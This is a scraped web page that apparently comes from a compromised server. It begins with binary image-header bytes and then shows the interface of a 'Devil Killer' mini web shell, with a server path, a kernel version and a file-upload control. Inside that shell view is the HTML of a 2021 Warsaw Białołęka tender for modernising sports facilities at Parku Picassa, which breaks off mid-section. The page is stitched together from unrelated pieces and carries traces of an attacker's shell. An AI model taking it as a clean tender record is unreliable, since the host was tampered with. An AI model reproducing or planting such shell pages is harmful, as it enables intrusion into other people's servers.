JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210806/0013977901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00139779 z dnia 2021-08-06</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Modernizacja obiektów sportowo-rekreacyjnych przy Parku Picassa w Warszawie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa Dzielnica Białołęka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Modlińska197</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">2244338465</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">BIALOLEKA.ZP@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.bialoleka.waw.pl/ https://zamowienia.um.warszawa.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Modernizacja obiektów sportowo-rekreacyjnych przy Parku Picassa w Warszawie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8f820dd7-f5db-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00139779</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002578/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.31 Wykonanie robót budowlanych dla inwestycji pn. "Modernizacja obiektów sportowo-rekreacyjnych przy Parku Picassa" zlokalizowanej na działce ew. nr 58 z obrębu 4-03-08 w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z SWZ w szczególności pkt 1.7, 6.3, 6.4</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zamowienia.um.warszawa.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Będziemy przetwarzać Pani/Pana dane osobowe, by mogła/mógł Pani/Pan załatwić sprawę w Urzędzie m.st. Warszawy. Pani/Pana dane osobowe mogą być przetwarzane w sposób zautomatyzowany, ale nie będą profilowane.<br/>Kto administruje moimi danymi?<br/>•	Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie m.st. Warszawy jest Prezydent m.st. Warszawy, z siedzibą w Warszawie (00-950), Pl. Bankowy 3/5. <br/>•	Na pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych, a także o przysługujące Pani/Panu prawa odpowie Inspektor Ochrony Danych w Urzędzie m.st. Warszawy. Proszę je wysłać na adres: iod@um.warszawa.pl.<br/>Dlaczego moje dane są przetwarzane?<br/>•	Wynika to bezpośrednio z konkretnego przepisu prawa, tj. ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.<br/>•	Pani/Pana dane osobowe przetwarzane są w celu: przeprowadzenia postępowania <br/>o udzielenie zamówienia publicznego.<br/>•	Podanie przez Panią/Pana danych osobowych jest obowiązkowe. Jeśli Pani/Pan tego nie zrobi, nie będziemy mogli zrealizować Pana/Pani sprawy . <br/>Jak długo będą przechowywane moje dane?<br/>•	Pani/Pana dane osobowe będą przechowywane przez czas wymagany przepisami prawa,<br/> tj. co najmniej przez okres 2 lat liczony od końca roku kalendarzowego, w którym, zostały pozyskane w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego (zgodnie z klasyfikacją archiwalną B-5).<br/> Potem, zgodnie z przepisami, dokumenty trafią do archiwum zakładowego.<br/>Kto może mieć dostęp do moich danych?<br/>Odbiorcami Pani/Pana danych osobowych mogą być:<br/>a)	podmioty, którym Administrator powierzy przetwarzanie danych osobowych, <br/>w szczególności:<br/>•	podmioty świadczące na rzecz Urzędu m.st. Warszawy usługi informatyczne, pocztowe;<br/>b)	organy publiczne i inne podmioty, którym Administrator udostępni dane osobowe na podstawie przepisów prawa; <br/>c)	podmioty, którym Administrator udostępni dane osobowe na podstawie Pani/Pana zgody.<br/>Jakie mam prawa w związku z przetwarzaniem moich danych?<br/>•	Ma Pani/Pan prawo do: <br/>1.	dostępu do danych osobowych, w tym uzyskania kopii tych danych;<br/>2.	żądania sprostowania (poprawienia) danych osobowych;<br/>3.	żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku, gdy:<br/>•	dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób przetwarzane;<br/>•	nie ma podstawy prawnej do przetwarzania Pani/Pana danych osobowych;<br/>•	wniosła Pani/Pan sprzeciw wobec przetwarzania i nie występują nadrzędne prawnie uzasadnione podstawy przetwarzania;<br/>•	Pani/Pana dane przetwarzane są niezgodnie z prawem;<br/>•	Pani/Pana dane muszą być usunięte, by wywiązać się z obowiązku wynikającego z przepisów prawa.<br/>4.	żądania ograniczenia przetwarzania danych osobowych;<br/>5. sprzeciwu wobec przetwarzania danych – w przypadku, gdy łącznie spełnione są następujące przesłanki:<br/>•	zaistnieją przyczyny związane z Pani/Pana szczególną sytuacją;<br/>•	dane przetwarzane są w celu wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej Administratorowi, z wyjątkiem sytuacji, w której Administrator wykaże istnienie ważnych prawnie uzasadnionych podstaw do przetwarzanie danych osobowych, nadrzędnych wobec interesów, praw i wolności osoby, której dane dotyczą, lub podstaw do ustalenia, dochodzenia lub obrony roszczeń;<br/>6.	Wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w Urzędzie m.st. Warszawy Pani/Pana danych osobowych.<br/>•	Nie przysługuje Pani/Panu prawo do przenoszenia danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-II-WZP-271.31.2021.MKA/TP1-Rb</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Modernizacji obiektów sportowo-rekreacyjnych przy Parku Picassa w Warszawie<br/><br/>1.	Zakres prac obejmuje w szczególności:<br/>1.	Roboty rozbiórkowe wraz z wywiezieniem i utylizacją materiałów z rozbiórki, <br/>2.	Wykonanie boiska wielofunkcyjnego do siatkówki, koszykówki i tenisa, <br/>3.	Wykonanie boiska wielofunkcyjnego do siatkówki i tenisa,<br/>4.	Wykonanie boiska do koszykówki,<br/>5.	Wykonanie strefy street workout <br/>6.	Wykonanie kompletnej dokumentacji powykonawczej ( 2 egz. w wersji papierowej oraz 1 egz. W wersji elektronicznej na nośniku CD lub DVD - rysunki w formacie pdf i dwg, część opisowa w formacie doc. i pdf).<br/>2.	Szczegółowy zakres Przedmiotu prac budowlanych zawarty jest w Dokumentacji projektowej wykonanej przez R.W. PERSPEKTYWA S.C, na którą składa się:<br/>a.	Projekt budowlano-wykonawczy – Modernizacja obiektów sportowo-rekreacyjnych przy Parku Picassa,<br/>b.	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych- Modernizacja obiektów sportowo-rekreacyjnych przy Parku Picassa.<br/>3. Wykonawca, zobowiązuje się w szczególności do:<br/>a)	ustawienia i utrzymana na własny koszt zaplecza budowy;<br/>b)	realizacji prac budowlanych, w oparciu o Dokumentację projektową, o której mowa powyżej oraz zgodnie z wiedzą techniczną, zaleceniami jednostek uzgadniających, obowiązującymi normami, wymogami technicznymi oraz przepisami prawa;<br/>c)	rozpoczęcia robót nie później niż w 3 dniu od wprowadzenia Wykonawcy na teren robót i ich prowadzenie w oparciu o zgłoszenie robót niewymagających pozwolenia na budowę;<br/>d)	prowadzenia dokumentacji budowy zgodnie z prawem budowlanym;<br/>e)	zajęcia i zagospodarowania terenu związanego z potrzebami budowy, zorganizowania zaplecza budowy łącznie z poniesieniem kosztów za media; <br/>f)	odpowieidzalności za zajęty plac budowy i zobowiązany jest do doprowadzenia terenu do porządku po zakończeniu robót w terminie 14 dni od dnia zakończenia robót budowlanych;<br/>g)	usunięcia wszystkich ewentualnych kolizji występujących na terenie budowy i pokrycia kosztów z tym związanych;<br/>h)	zapewnienia jak najmniejszej uciążliwości prowadzonych robót użytkowników parku Picassa i okolicznych mieszkańców;<br/>i)	zapewnienia i zabezpieczenia dojść i dojazdów do terenu parku Picassa;<br/>j)	stosowania technologii i sprzętu nie powodujących przekroczeń dopuszczalnych norm zapylenia i natężenia hałasu;<br/>k)	opracowania planu bezpieczeństwa pracy i ochrony zdrowia dla budowy i zaplecza;<br/>l)	posiadania ubezpieczenia od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności gospodarczej i działań podwykonawców na czas realizacji Przedmiotu umowy w wysokości nie mniejszej niż wartość umowy brutto,<br/>m)	wywiezienia ewentualnej nadwyżki ziemi lub dowiezienie ewentualnych niedoborów ziemi<br/>n)	oskręślenia odległości i miejsc wywozu i dowozu ziemi;<br/>o)	oznakowania terenu budowy zgodnie z wymogami i zabezpieczenie go zgodnie z przepisami BHP oraz pokrycia kosztów wszystkich robót i czynności z tym związanych;<br/>p)	wykonania robót w sposób zapewniający bezpieczeństwo zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 6 lutego 2003 r., w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. Nr 47, poz. 401 ze zm.);<br/>q)	wykonania badań wymaganych na etapie odbiorów;<br/>r)	zapewnienia i pokrycia kosztów pełnej obsługi geodezyjnej łącznie z określeniem współrzędnych;<br/>s)	wykonania robót z materiałów własnych, które powinny odpowiadać jakościowo wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonym art. 10 ustawy z dnia 7 lipca 1994r. – Prawo budowlane (Dz. U. z 2020 r., poz. 1333 ze zm.);<br/>t)	realizacji inwestycji zgodnie z zaleceniami Zamawiającego, uzgodnieniami gestorów mediów, usytuowania projektowanych sieci uzbrojenia terenu;<br/>u)	protokolarnego przekazania Zamawiającemu wykonanych robót;<br/>v)	wykonanie w dwóch egzemplarzach w formie papierowej oraz jeden w formie elektronicznej, zgodnie z obowiązującymi przepisami budowlanej dokumentacji powykonawczej i przekazania jej Zamawiającemu w terminie 14 dni od daty zgłoszenia zakończenia robót;<br/>w)	przedstawienia podczas odbiorów i przekazania Zamawiającemu wraz z budowlaną dokumentacją powykonawczą oryginalnych atestów i świadectw dopuszczających do stosowania (zgodnie z wymogami prawa budowlanego, przepisów przeciwpożarowych, sanitarno-epidemiologicznych i inspekcji pracy) użytych przy realizacji zamówienia materiałów budowlanych;<br/>x)	zapewnienia na okres (zgodnie z oferta wykonawcy) od daty odbioru końcowego Przedmiotu umowy gwarancji jakości;<br/>y)	likwidacji zaplecza budowy, uporządkowania terenu oraz przywrócenia terenu do stanu sprzed rozpoczęcia robót (m. im. naprawa ogrodzenia boiska jeśli zajdzie taka potrzeba, rekultywacja zieleni) w terminie 14 dni od dnia zakończenia robót budowlanych;<br/>z)	udziału w przeglądach gwarancyjnych Przedmiotu umowy w każdym roku trwania gwarancji jakości; o terminach przeglądów gwarancyjnych Zamawiający poinformuje Wykonawcę pisemnie, faksem lub elektronicznie;<br/>aa)	materiały pozostałe z rozbiórki Wykonawca zutylizuje na własny koszt i przedstawi odpowiednie dokumenty poświadczające utylizację;<br/>bb)	zabezpieczenie istniejących drzew na czas prowadzonych robót, i ponadto nie składowania materiałów budowlanych w promieniu 3 m od pnia drzewa oraz postoju maszyn budowlanych;<br/>cc)	zawiadomienia Zamawiającego o wykonaniu robót zanikających lub ulegających zakryciu z co najmniej 3-dniowym wyprzedzeniem. Jeżeli Wykonawca nie wykona tego obowiązku zobowiązany będzie do odkrycia tych robót lub wykonania otworów niezbędnych do zbadania tych robót, a następnie przywrócenia ich do stanu poprzedniego na własny koszt i ryzyko.<br/>dd)	zapewnienia odpowiedniej ilości pracowników, nawet w systemie zmianowym, aby Przedmiot umowy został wykonany w terminie.<br/>ee)	poniesienia kosztów zużycia mediów (dla potrzeb budowy) i zamontowania na własny koszt liczników zużycia wody i energii elektrycznej oraz ponoszenia kosztów dostaw i zużycia (w tym opłat stałych) wody, energii elektrycznej i innych mediów w okresie trwania umowy, lecz nie dłużej niż do protokolarnego przejęcia przez Zamawiającego Przedmiotu umowy.<br/><br/>Ponadto Wykonawca zobowiązuje się do ponoszenia odpowiedzialności za szkody powstałe w trakcie realizacji Przedmiotu umowy i ich naprawienia oraz do ponoszenia odpowiedzialności za działania, uchybienia i zaniechania podwykonawców jak za działania, uchybienia lub zaniechania własne.<br/><br/>Przedmiary robót są jedynie materiałem pomocniczym, który Wykonawca zobowiązany jest zweryfikować na podstawie otrzymanej dokumentacji budowlano-wykonawczej, pod kątem rodzajów i ilości robót.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach do SWZ - we wzorze umowy (załącznik nr 8) i Dokumentacji projektowej (załącznik nr 1).<br/>Zamawiający zgodnie z art. 131 ust 2 nie wymaga od Wykonawcy:<br/>- odbycia przez wykonawcę wizji lokalnej lub<br/>- sprawdzenia przez wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45236200-2 - Wyrównywanie nawierzchni obiektów sportowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">65 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">8.2.2.	Długość terminu gwarancji jakości na modernizację obiektów sportowo-rekreacyjnych przy Parku Picassa - w pełnych miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	w zakresie zdolności zawodowej (doświadczenia w realizacji) - warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich 5-ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał 2 zamówienia, tj.:<br/>- zamówienie polegające na budowie/przebudowie: co najmniej jednego obiektu sportowo-rekreacyjnego z nawierzchnią betonową o powierzchni nawierzchni betonowej minimum 500 m2.<br/>W przypadku realizacji w ramach jednego zamówienia więcej niż jednego obiektu sportowo-rekreacyjnego łączna powierzchnia wykonanej nawierzchni betonowej nie może być mniejsza niż 500 m2.<br/><br/>oraz <br/><br/>- zamówienie polegające na budowie/przebudowie co najmniej jednego obiektu sportowo-rekreacyjnego z nawierzchnią syntetyczną o powierzchni nawierzchni syntetycznej minimum 1400 m2.<br/>W przypadku realizacji w ramach jednego zamówienia więcej niż jednego obiektu sportowo-rekreacyjnego łączna powierzchnia wykonanej nawierzchni syntetycznej nie może być mniejsza niż 1400 m2 .<br/><br/>Przez jedno zamówienie Zamawiający rozumie zamówienie udzielne w ramach jednej umowy, które zostało zakończone przed terminem składania ofert.<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie, wykonawcy muszą wykazać, że powyższe warunki spełniają wspólnie (łącznie) lub samodzielnie lub polegając na zasobach innych podmiotów.<br/><br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>b)	w zakresie kwalifikacji zawodowych i uprawnień (w zakresie dysponowania osobami zdolnymi do wykonania zamówienia) – warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje osobami, które zgodnie z wymogami art. 12 ustawy z 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) mogą pełnić samodzielne funkcje techniczne w budownictwie w zakresie odpowiednich specjalności, tj.:<br/><br/>minimum 1 osobą posiadająca uprawnienia w branży konstrukcyjno-budowlanej, która będzie pełniła funkcję kierownika budowy<br/><br/>UWAGA: Osoby, które przed dniem wejścia w życie ww. ustawy, tj. przed 1 stycznia 1995 r. - uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie oraz uprawnienia uznane na zasadach określonych w ustawie (z dnia 22 grudnia 2015 r.), o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2020 r., poz.220 j.t. z ze zm.), których zakres uprawnia do pełnienia wskazanej funkcji przy realizacji przedmiotu zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- oświadczenie o braku podstaw do wykluczenia z postępowania <br/>- aktualnego na dzień złożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym jest mowa w pkt 3.4.1 SWZ w zakresie art. 108 ust.1 ustawy pzp – załącznik 2a do SWZ,<br/>- aktualnego na dzień złożenia oświadczenia o braku przynależności do grupy kapitałowej – zgodnie z art. 108 ust 1 pkt 5 ustawy pzp – załącznik 